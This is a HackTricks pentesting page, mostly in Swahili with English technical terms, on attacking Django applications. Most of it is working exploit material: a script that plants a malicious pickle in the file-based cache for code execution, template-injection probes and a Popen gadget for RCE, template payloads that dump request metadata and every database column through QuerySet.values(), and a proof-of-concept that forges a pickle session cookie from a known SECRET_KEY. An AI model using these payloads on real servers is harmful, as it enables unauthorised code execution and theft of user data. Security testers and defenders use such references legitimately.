HackTricks
Django
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na π¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter π¦ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Cache Manipulation to RCE
Djangoβs default cache storage method is Python pickles, which can lead to RCE if untrusted input is unpickled. Ikiwa attacker anaweza kupata write access kwenye cache, wanaweza kuinua vulnerability hii hadi RCE kwenye server ya msingi.
Django cache imehifadhiwa katika moja ya maeneo manne: Redis, memory, files, au database. Cache iliyohifadhiwa kwenye Redis server au database ndizo attack vectors zinazowezekana zaidi (Redis injection na SQL injection), lakini attacker anaweza pia kutumia file-based cache kubadilisha arbitrary write kuwa RCE. Maintainers wameitaja hii kama non-issue. Ni muhimu kutambua kwamba folda ya cache file, SQL table name, na Redis server details zitabadilika kulingana na implementation.
Kwenye FileBasedCache, pickled value inaandikwa kwenye file chini ya CACHES['default']['LOCATION'] (mara nyingi /var/tmp/django_cache/). Ikiwa directory hiyo ni world-writable au inasimamiwa na attacker, kuingiza malicious pickle chini ya expected cache key hutoa code execution wakati app inaisoma:
python - <<'PY'
import pickle, os
class RCE:
def __reduce__(self):
return (os.system, ("id >/tmp/pwned",))
open('/var/tmp/django_cache/cache:malicious', 'wb').write(pickle.dumps(RCE(), protocol=4))
PY
This HackerOne report provides a great, reproducible example of exploiting Django cache stored in a SQLite database: https://hackerone.com/reports/1415436
Server-Side Template Injection (SSTI)
The Django Template Language (DTL) ni Turing-complete. Ikiwa data iliyotolewa na mtumiaji inarenderwa kama template string (kwa mfano kwa kuita Template(user_input).render() au wakati |safe/format_html() zinaondoa auto-escaping), mshambuliaji anaweza kupata SSTI kamili β RCE.
Detection
- Tafuta wito wa dynamic kwa
Template()/Engine.from_string()/render_to_string()ambazo zinajumuisha data yoyote ya request isiyosafishwa. - Tuma payload iliyotegemea muda au ya arithmetic:
{{7*7}}
Ikiwa output iliyorenderwa ina 49, ingizo linatambuliwa na template engine.
3. DTL ni not Jinja2: arithmetic/loop payloads mara nyingi husababisha TemplateSyntaxError/500 huku bado zikithibitisha evaluation. Polyglots kama ${{<%[%'"}}% ni probes nzuri za crash-au-render.
Context exfiltration when RCE is blocked
Hata kama object-walking kwenda subprocess.Popen inashindwa, DTL bado inaonyesha in-scope objects:
{{ request }} {# confirm SSTI #}
{{ request.META }} {# leak Gunicorn/UWSGI headers, cookies, proxy info #}
{{ users }} {# QuerySet in the context? #}
{{ users.0 }} {# first row #}
{{ users.values }} {# dumps dicts of every column (email/flags/plaintext passwords if stored) #}
QuerySet.values() hufanya safu kuwa dictionaries, ikiepuka __str__ na kufichua viwanja vyote vinavyorejeshwa na queryset. Hii inafanya kazi hata wakati utekelezaji wa moja kwa moja wa Python umewekewa vikwazo.
Mfano wa otomatiki: thibitisha, chukua CSRF token, hifadhi payload iliyo na prefiksi ya alama katika uwanja wowote wa kudumu (mf., username/profile bio), kisha omba view inayoiweka (AJAX endpoints kama /likes/<id> ni za kawaida). Changanua sifa thabiti (mf., title="...") ili kupata matokeo yaliyotengenezwa na kurudia payloads.
Primitivu kwa RCE
Django inazuia ufikiaji wa moja kwa moja wa __import__, lakini grafu ya vitu ya Python inaweza kufikiwa:
{{''.__class__.mro()[1].__subclasses__()}}
Pata index ya subprocess.Popen (β400β500, kutegemea build ya Python) na endesha amri yoyote:
{{''.__class__.mro()[1].__subclasses__()[438]('id',shell=True,stdout=-1).communicate()[0]}}
Gadget ya universal salama ni kurudia hadi cls.__name__ == 'Popen'.
The same gadget works for Debug Toolbar or Django-CMS template rendering features that mishandle user input.
Pia angalia: ReportLab/xhtml2pdf PDF export RCE
Maombi yaliyojengwa juu ya Django mara nyingi hujumuisha xhtml2pdf/ReportLab ili kuhamisha views kama PDF. Wakati HTML inayodhibitiwa na mtumiaji inafurika katika uzalishaji wa PDF, rl_safe_eval inaweza kutathmini maelezo ndani ya mabano matatu [[[ ... ]]], ikiruhusu utekelezaji wa msimbo (CVE-2023-33733). Maelezo, payloads, na mbinu za kupunguza hatari:
Reportlab Xhtml2pdf Triple Brackets Expression Evaluation Rce Cve 2023 33733
Pickle-Backed Session Cookie RCE
Ikiwa setting SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer' imewezeshwa (au serializer maalum unaodeserialise pickle), Django decrypts and unpickles cookie ya session kabla ya kuita code yoyote ya view. Kwa hivyo, kuwa na funguo halali ya kusaini (mradi SECRET_KEY kwa chaguo-msingi) inatosha kwa utekelezaji wa msimbo kwa mbali mara moja.
Exploit Requirements
- Seva inatumia
PickleSerializer. - Mshambuliaji anajua / anaweza kukisia
settings.SECRET_KEY(leaks via GitHub,.env, error pages, etc.).
Uthibitisho wa Dhana
#!/usr/bin/env python3
from django.contrib.sessions.serializers import PickleSerializer
from django.core import signing
import os, base64
class RCE(object):
def __reduce__(self):
return (os.system, ("id > /tmp/pwned",))
mal = signing.dumps(RCE(), key=b'SECRET_KEY_HERE', serializer=PickleSerializer)
print(f"sessionid={mal}")
Tuma cookie iliyopatikana, na payload inatekelezwa kwa ruhusa za WSGI worker.
Kupunguza hatari: Tumia JSONSerializer ya chaguo-msingi, zungusha SECRET_KEY, na sanidi SESSION_COOKIE_HTTPONLY.
CVE za Django zenye Athari Kuu (2023-2025) ambazo Pentesters wanapaswa kuangalia
- CVE-2025-48432 β Log Injection via unescaped
request.path(imenasishwa 4 Jun 2025). Inamruhusu mshambuliaji kuingiza newlines/ANSI codes kwenye log files na kuharibu uchambuzi wa log unaofuata. Patch level β₯ 4.2.22 / 5.1.10 / 5.2.2. - CVE-2024-42005 β Critical SQL injection in
QuerySet.values()/values_list()onJSONField(CVSS 9.8). Tengeneza JSON keys kuvunja quoting na kutekeleza SQL yoyote. Imenasishwa katika 4.2.15 / 5.0.8.
Daima tambua toleo kamili la framework kwa kutumia ukurasa wa kosa wa X-Frame-Options au hash ya /static/admin/css/base.css na jaribu mambo hapo juu pale yanapofaa.
Marejeleo
- Taarifa za usalama za Django β βDjango 5.2.2, 5.1.10, 4.2.22 address CVE-2025-48432β β 4 Jun 2025.
- OP-Innovate: βDjango releases security updates to address SQL injection flaw CVE-2024-42005β β 11 Aug 2024.
- 0xdf: University (HTB) β Exploiting xhtml2pdf/ReportLab CVE-2023-33733 to gain RCE and pivot into AD β https://0xdf.gitlab.io/2025/08/09/htb-university.html
- Django docs β QuerySet.values(): https://docs.djangoproject.com/en/6.0/ref/models/querysets/#values
- 0xdf: HackNet (HTB) β HTML Attribute Injection β Django SSTI β QuerySet.values data dump β Pickle FileBasedCache RCE β https://0xdf.gitlab.io/2026/01/17/htb-hacknet.html
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
Jifunze na fanya mazoezi ya GCP Hacking:Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na π¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter π¦ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.